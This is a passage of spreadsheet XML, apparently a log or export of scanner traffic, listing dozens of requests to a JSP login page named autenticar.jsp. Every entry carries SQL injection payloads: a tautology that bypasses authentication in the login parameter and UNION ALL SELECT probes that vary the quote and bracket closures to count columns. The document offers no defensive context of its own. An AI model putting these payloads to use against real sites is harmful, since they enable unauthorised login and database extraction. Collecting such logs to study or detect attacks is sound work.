    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)))unionallselect5234,5234,5234,5234,5234,5234,5234,5234,5234,5234,5234,5234,5234,5234,5234,5234,5234,5234,5234,5234,5234,5234,5234,5234,5234#and(((3378=3378</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)))unionallselect8434,8434,8434,8434,8434,8434,8434,8434,8434,8434,8434,8434,8434,8434,8434,8434,8434,8434,8434,8434,8434,8434,8434,8434,8434,8434#and(((5059=5059</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)))unionallselect9632,9632,9632,9632,9632,9632,9632,9632,9632,9632,9632,9632,9632,9632,9632,9632,9632,9632,9632,9632,9632,9632,9632,9632,9632,9632,9632#and(((6998=6998</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)))unionallselect2832,2832,2832,2832,2832,2832,2832,2832,2832,2832,2832,2832,2832,2832,2832,2832,2832,2832,2832,2832,2832,2832,2832,2832,2832,2832,2832,2832#and(((252=252</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)))unionallselect2429,2429,2429,2429,2429,2429,2429,2429,2429,2429,2429,2429,2429,2429,2429,2429,2429,2429,2429,2429,2429,2429,2429,2429,2429,2429,2429,2429,2429#and(((4638=4638</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)))unionallselect3728,3728,3728,3728,3728,3728,3728,3728,3728,3728,3728,3728,3728,3728,3728,3728,3728,3728,3728,3728,3728,3728,3728,3728,3728,3728,3728,3728,3728,3728#and(((6680=6680</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrarunionallselect4819,4819,4819,4819,4819,4819,4819,4819,4819,4819,4819,4819,4819,4819,4819,4819,4819,4819,4819,4819,4819#</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrarunionallselect7037,7037,7037,7037,7037,7037,7037,7037,7037,7037,7037,7037,7037,7037,7037,7037,7037,7037,7037,7037,7037,7037#</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrarunionallselect5576,5576,5576,5576,5576,5576,5576,5576,5576,5576,5576,5576,5576,5576,5576,5576,5576,5576,5576,5576,5576,5576,5576#</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrarunionallselect9778,9778,9778,9778,9778,9778,9778,9778,9778,9778,9778,9778,9778,9778,9778,9778,9778,9778,9778,9778,9778,9778,9778,9778#</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrarunionallselect5118,5118,5118,5118,5118,5118,5118,5118,5118,5118,5118,5118,5118,5118,5118,5118,5118,5118,5118,5118,5118,5118,5118,5118,5118#</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrarunionallselect5362,5362,5362,5362,5362,5362,5362,5362,5362,5362,5362,5362,5362,5362,5362,5362,5362,5362,5362,5362,5362,5362,5362,5362,5362,5362#</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrarunionallselect1240,1240,1240,1240,1240,1240,1240,1240,1240,1240,1240,1240,1240,1240,1240,1240,1240,1240,1240,1240,1240,1240,1240,1240,1240,1240,1240#</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrarunionallselect4468,4468,4468,4468,4468,4468,4468,4468,4468,4468,4468,4468,4468,4468,4468,4468,4468,4468,4468,4468,4468,4468,4468,4468,4468,4468,4468,4468#</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrarunionallselect9919,9919,9919,9919,9919,9919,9919,9919,9919,9919,9919,9919,9919,9919,9919,9919,9919,9919,9919,9919,9919,9919,9919,9919,9919,9919,9919,9919,9919#</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrarunionallselect8216,8216,8216,8216,8216,8216,8216,8216,8216,8216,8216,8216,8216,8216,8216,8216,8216,8216,8216,8216,8216,8216,8216,8216,8216,8216,8216,8216,8216,8216#</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')unionallselect8668,8668,8668,8668,8668,8668,8668,8668,8668,8668,8668,8668,8668,8668,8668,8668,8668,8668,8668,8668,8668#and('aplr'='aplr</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')unionallselect1984,1984,1984,1984,1984,1984,1984,1984,1984,1984,1984,1984,1984,1984,1984,1984,1984,1984,1984,1984,1984,1984#and('dkyv'='dkyv</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')unionallselect2363,2363,2363,2363,2363,2363,2363,2363,2363,2363,2363,2363,2363,2363,2363,2363,2363,2363,2363,2363,2363,2363,2363#and('fsbs'='fsbs</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')unionallselect3554,3554,3554,3554,3554,3554,3554,3554,3554,3554,3554,3554,3554,3554,3554,3554,3554,3554,3554,3554,3554,3554,3554,3554#and('svtq'='svtq</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')unionallselect2724,2724,2724,2724,2724,2724,2724,2724,2724,2724,2724,2724,2724,2724,2724,2724,2724,2724,2724,2724,2724,2724,2724,2724,2724#and('ehfw'='ehfw</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')unionallselect6541,6541,6541,6541,6541,6541,6541,6541,6541,6541,6541,6541,6541,6541,6541,6541,6541,6541,6541,6541,6541,6541,6541,6541,6541,6541#and('vhrs'='vhrs</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')unionallselect5164,5164,5164,5164,5164,5164,5164,5164,5164,5164,5164,5164,5164,5164,5164,5164,5164,5164,5164,5164,5164,5164,5164,5164,5164,5164,5164#and('xown'='xown</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')unionallselect5535,5535,5535,5535,5535,5535,5535,5535,5535,5535,5535,5535,5535,5535,5535,5535,5535,5535,5535,5535,5535,5535,5535,5535,5535,5535,5535,5535#and('uusk'='uusk</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')unionallselect2719,2719,2719,2719,2719,2719,2719,2719,2719,2719,2719,2719,2719,2719,2719,2719,2719,2719,2719,2719,2719,2719,2719,2719,2719,2719,2719,2719,2719#and('yusn'='yusn</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')unionallselect6409,6409,6409,6409,6409,6409,6409,6409,6409,6409,6409,6409,6409,6409,6409,6409,6409,6409,6409,6409,6409,6409,6409,6409,6409,6409,6409,6409,6409,6409#and('vryd'='vryd</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'))unionallselect2844,2844,2844,2844,2844,2844,2844,2844,2844,2844,2844,2844,2844,2844,2844,2844,2844,2844,2844,2844,2844#and(('kmjb'='kmjb</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'))unionallselect7819,7819,7819,7819,7819,7819,7819,7819,7819,7819,7819,7819,7819,7819,7819,7819,7819,7819,7819,7819,7819,7819#and(('fnyt'='fnyt</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'))unionallselect3697,3697,3697,3697,3697,3697,3697,3697,3697,3697,3697,3697,3697,3697,3697,3697,3697,3697,3697,3697,3697,3697,3697#and(('dgqp'='dgqp</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'))unionallselect8036,8036,8036,8036,8036,8036,8036,8036,8036,8036,8036,8036,8036,8036,8036,8036,8036,8036,8036,8036,8036,8036,8036,8036#and(('owcs'='owcs</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'))unionallselect834,834,834,834,834,834,834,834,834,834,834,834,834,834,834,834,834,834,834,834,834,834,834,834,834#and(('axld'='axld</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'))unionallselect9596,9596,9596,9596,9596,9596,9596,9596,9596,9596,9596,9596,9596,9596,9596,9596,9596,9596,9596,9596,9596,9596,9596,9596,9596,9596#and(('tluo'='tluo</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'))unionallselect968,968,968,968,968,968,968,968,968,968,968,968,968,968,968,968,968,968,968,968,968,968,968,968,968,968,968#and(('nahm'='nahm</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'))unionallselect9165,9165,9165,9165,9165,9165,9165,9165,9165,9165,9165,9165,9165,9165,9165,9165,9165,9165,9165,9165,9165,9165,9165,9165,9165,9165,9165,9165#and(('jqqe'='jqqe</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'))unionallselect5672,5672,5672,5672,5672,5672,5672,5672,5672,5672,5672,5672,5672,5672,5672,5672,5672,5672,5672,5672,5672,5672,5672,5672,5672,5672,5672,5672,5672#and(('doeu'='doeu</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'))unionallselect6721,6721,6721,6721,6721,6721,6721,6721,6721,6721,6721,6721,6721,6721,6721,6721,6721,6721,6721,6721,6721,6721,6721,6721,6721,6721,6721,6721,6721,6721#and(('kacb'='kacb</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')))unionallselect9143,9143,9143,9143,9143,9143,9143,9143,9143,9143,9143,9143,9143,9143,9143,9143,9143,9143,9143,9143,9143#and((('jucw'='jucw</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')))unionallselect2331,2331,2331,2331,2331,2331,2331,2331,2331,2331,2331,2331,2331,2331,2331,2331,2331,2331,2331,2331,2331,2331#and((('aknz'='aknz</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')))unionallselect7311,7311,7311,7311,7311,7311,7311,7311,7311,7311,7311,7311,7311,7311,7311,7311,7311,7311,7311,7311,7311,7311,7311#and((('yvzi'='yvzi</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')))unionallselect1502,1502,1502,1502,1502,1502,1502,1502,1502,1502,1502,1502,1502,1502,1502,1502,1502,1502,1502,1502,1502,1502,1502,1502#and((('mxep'='mxep</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')))unionallselect7625,7625,7625,7625,7625,7625,7625,7625,7625,7625,7625,7625,7625,7625,7625,7625,7625,7625,7625,7625,7625,7625,7625,7625,7625#and((('fekr'='fekr</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')))unionallselect4998,4998,4998,4998,4998,4998,4998,4998,4998,4998,4998,4998,4998,4998,4998,4998,4998,4998,4998,4998,4998,4998,4998,4998,4998,4998#and((('jwmw'='jwmw</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')))unionallselect1912,1912,1912,1912,1912,1912,1912,1912,1912,1912,1912,1912,1912,1912,1912,1912,1912,1912,1912,1912,1912,1912,1912,1912,1912,1912,1912#and((('ifmf'='ifmf</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')))unionallselect6184,6184,6184,6184,6184,6184,6184,6184,6184,6184,6184,6184,6184,6184,6184,6184,6184,6184,6184,6184,6184,6184,6184,6184,6184,6184,6184,6184#and((('nbjk'='nbjk</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')))unionallselect3255,3255,3255,3255,3255,3255,3255,3255,3255,3255,3255,3255,3255,3255,3255,3255,3255,3255,3255,3255,3255,3255,3255,3255,3255,3255,3255,3255,3255#and((('iqoa'='iqoa</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')))unionallselect5256,5256,5256,5256,5256,5256,5256,5256,5256,5256,5256,5256,5256,5256,5256,5256,5256,5256,5256,5256,5256,5256,5256,5256,5256,5256,5256,5256,5256,5256#and((('derb'='derb</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'unionallselect6999,6999,6999,6999,6999,6999,6999,6999,6999,6999,6999,6999,6999,6999,6999,6999,6999,6999,6999,6999,6999#and'anur'='anur</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'unionallselect6615,6615,6615,6615,6615,6615,6615,6615,6615,6615,6615,6615,6615,6615,6615,6615,6615,6615,6615,6615,6615,6615#and'vgtf'='vgtf</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'unionallselect7293,7293,7293,7293,7293,7293,7293,7293,7293,7293,7293,7293,7293,7293,7293,7293,7293,7293,7293,7293,7293,7293,7293#and'aitv'='aitv</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'unionallselect9734,9734,9734,9734,9734,9734,9734,9734,9734,9734,9734,9734,9734,9734,9734,9734,9734,9734,9734,9734,9734,9734,9734,9734#and'bwqp'='bwqp</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'unionallselect1067,1067,1067,1067,1067,1067,1067,1067,1067,1067,1067,1067,1067,1067,1067,1067,1067,1067,1067,1067,1067,1067,1067,1067,1067#and'rhny'='rhny</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'unionallselect7303,7303,7303,7303,7303,7303,7303,7303,7303,7303,7303,7303,7303,7303,7303,7303,7303,7303,7303,7303,7303,7303,7303,7303,7303,7303#and'tdwp'='tdwp</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'unionallselect9393,9393,9393,9393,9393,9393,9393,9393,9393,9393,9393,9393,9393,9393,9393,9393,9393,9393,9393,9393,9393,9393,9393,9393,9393,9393,9393#and'sxuz'='sxuz</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'unionallselect120,120,120,120,120,120,120,120,120,120,120,120,120,120,120,120,120,120,120,120,120,120,120,120,120,120,120,120#and'exhn'='exhn</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'unionallselect4091,4091,4091,4091,4091,4091,4091,4091,4091,4091,4091,4091,4091,4091,4091,4091,4091,4091,4091,4091,4091,4091,4091,4091,4091,4091,4091,4091,4091#and'swmc'='swmc</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'unionallselect8315,8315,8315,8315,8315,8315,8315,8315,8315,8315,8315,8315,8315,8315,8315,8315,8315,8315,8315,8315,8315,8315,8315,8315,8315,8315,8315,8315,8315,8315#and'ybre'='ybre</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')unionallselect1417,1417,1417,1417,1417,1417,1417,1417,1417,1417,1417,1417,1417,1417,1417,1417,1417,1417,1417,1417,1417#and('kqsa'like'kqsa</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')unionallselect3075,3075,3075,3075,3075,3075,3075,3075,3075,3075,3075,3075,3075,3075,3075,3075,3075,3075,3075,3075,3075,3075#and('dgbo'like'dgbo</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')unionallselect7652,7652,7652,7652,7652,7652,7652,7652,7652,7652,7652,7652,7652,7652,7652,7652,7652,7652,7652,7652,7652,7652,7652#and('nsld'like'nsld</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')unionallselect9073,9073,9073,9073,9073,9073,9073,9073,9073,9073,9073,9073,9073,9073,9073,9073,9073,9073,9073,9073,9073,9073,9073,9073#and('qrsv'like'qrsv</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')unionallselect4463,4463,4463,4463,4463,4463,4463,4463,4463,4463,4463,4463,4463,4463,4463,4463,4463,4463,4463,4463,4463,4463,4463,4463,4463#and('krdv'like'krdv</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')unionallselect855,855,855,855,855,855,855,855,855,855,855,855,855,855,855,855,855,855,855,855,855,855,855,855,855,855#and('ouah'like'ouah</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')unionallselect2906,2906,2906,2906,2906,2906,2906,2906,2906,2906,2906,2906,2906,2906,2906,2906,2906,2906,2906,2906,2906,2906,2906,2906,2906,2906,2906#and('qdjx'like'qdjx</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')unionallselect929,929,929,929,929,929,929,929,929,929,929,929,929,929,929,929,929,929,929,929,929,929,929,929,929,929,929,929#and('gftw'like'gftw</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')unionallselect3589,3589,3589,3589,3589,3589,3589,3589,3589,3589,3589,3589,3589,3589,3589,3589,3589,3589,3589,3589,3589,3589,3589,3589,3589,3589,3589,3589,3589#and('xeia'like'xeia</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')unionallselect5357,5357,5357,5357,5357,5357,5357,5357,5357,5357,5357,5357,5357,5357,5357,5357,5357,5357,5357,5357,5357,5357,5357,5357,5357,5357,5357,5357,5357,5357#and('kfts'like'kfts</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'))unionallselect5285,5285,5285,5285,5285,5285,5285,5285,5285,5285,5285,5285,5285,5285,5285,5285,5285,5285,5285,5285,5285#and(('kkoo'like'kkoo</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'))unionallselect2447,2447,2447,2447,2447,2447,2447,2447,2447,2447,2447,2447,2447,2447,2447,2447,2447,2447,2447,2447,2447,2447#and(('tiet'like'tiet</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'))unionallselect7306,7306,7306,7306,7306,7306,7306,7306,7306,7306,7306,7306,7306,7306,7306,7306,7306,7306,7306,7306,7306,7306,7306#and(('jirc'like'jirc</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'))unionallselect7517,7517,7517,7517,7517,7517,7517,7517,7517,7517,7517,7517,7517,7517,7517,7517,7517,7517,7517,7517,7517,7517,7517,7517#and(('gtry'like'gtry</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'))unionallselect4711,4711,4711,4711,4711,4711,4711,4711,4711,4711,4711,4711,4711,4711,4711,4711,4711,4711,4711,4711,4711,4711,4711,4711,4711#and(('eqwm'like'eqwm</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'))unionallselect5700,5700,5700,5700,5700,5700,5700,5700,5700,5700,5700,5700,5700,5700,5700,5700,5700,5700,5700,5700,5700,5700,5700,5700,5700,5700#and(('jlre'like'jlre</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'))unionallselect2409,2409,2409,2409,2409,2409,2409,2409,2409,2409,2409,2409,2409,2409,2409,2409,2409,2409,2409,2409,2409,2409,2409,2409,2409,2409,2409#and(('esiu'like'esiu</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'))unionallselect9131,9131,9131,9131,9131,9131,9131,9131,9131,9131,9131,9131,9131,9131,9131,9131,9131,9131,9131,9131,9131,9131,9131,9131,9131,9131,9131,9131#and(('mgpc'like'mgpc</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'))unionallselect9776,9776,9776,9776,9776,9776,9776,9776,9776,9776,9776,9776,9776,9776,9776,9776,9776,9776,9776,9776,9776,9776,9776,9776,9776,9776,9776,9776,9776#and(('rtzt'like'rtzt</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'))unionallselect3234,3234,3234,3234,3234,3234,3234,3234,3234,3234,3234,3234,3234,3234,3234,3234,3234,3234,3234,3234,3234,3234,3234,3234,3234,3234,3234,3234,3234,3234#and(('tgww'like'tgww</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')))unionallselect7898,7898,7898,7898,7898,7898,7898,7898,7898,7898,7898,7898,7898,7898,7898,7898,7898,7898,7898,7898,7898#and((('vapd'like'vapd</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')))unionallselect1001,1001,1001,1001,1001,1001,1001,1001,1001,1001,1001,1001,1001,1001,1001,1001,1001,1001,1001,1001,1001,1001#and((('trts'like'trts</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')))unionallselect278,278,278,278,278,278,278,278,278,278,278,278,278,278,278,278,278,278,278,278,278,278,278#and((('uddt'like'uddt</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')))unionallselect6677,6677,6677,6677,6677,6677,6677,6677,6677,6677,6677,6677,6677,6677,6677,6677,6677,6677,6677,6677,6677,6677,6677,6677#and((('umpc'like'umpc</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')))unionallselect1287,1287,1287,1287,1287,1287,1287,1287,1287,1287,1287,1287,1287,1287,1287,1287,1287,1287,1287,1287,1287,1287,1287,1287,1287#and((('oodm'like'oodm</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')))unionallselect5519,5519,5519,5519,5519,5519,5519,5519,5519,5519,5519,5519,5519,5519,5519,5519,5519,5519,5519,5519,5519,5519,5519,5519,5519,5519#and((('rbdq'like'rbdq</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')))unionallselect5122,5122,5122,5122,5122,5122,5122,5122,5122,5122,5122,5122,5122,5122,5122,5122,5122,5122,5122,5122,5122,5122,5122,5122,5122,5122,5122#and((('cdev'like'cdev</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')))unionallselect336,336,336,336,336,336,336,336,336,336,336,336,336,336,336,336,336,336,336,336,336,336,336,336,336,336,336,336#and((('oznv'like'oznv</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')))unionallselect2679,2679,2679,2679,2679,2679,2679,2679,2679,2679,2679,2679,2679,2679,2679,2679,2679,2679,2679,2679,2679,2679,2679,2679,2679,2679,2679,2679,2679#and((('btgq'like'btgq</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')))unionallselect1113,1113,1113,1113,1113,1113,1113,1113,1113,1113,1113,1113,1113,1113,1113,1113,1113,1113,1113,1113,1113,1113,1113,1113,1113,1113,1113,1113,1113,1113#and((('smcw'like'smcw</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'unionallselect1579,1579,1579,1579,1579,1579,1579,1579,1579,1579,1579,1579,1579,1579,1579,1579,1579,1579,1579,1579,1579#and'mvuy'like'mvuy</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'unionallselect9283,9283,9283,9283,9283,9283,9283,9283,9283,9283,9283,9283,9283,9283,9283,9283,9283,9283,9283,9283,9283,9283#and'ooyk'like'ooyk</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'unionallselect6208,6208,6208,6208,6208,6208,6208,6208,6208,6208,6208,6208,6208,6208,6208,6208,6208,6208,6208,6208,6208,6208,6208#and'aclt'like'aclt</t>
  </si>
  <si>
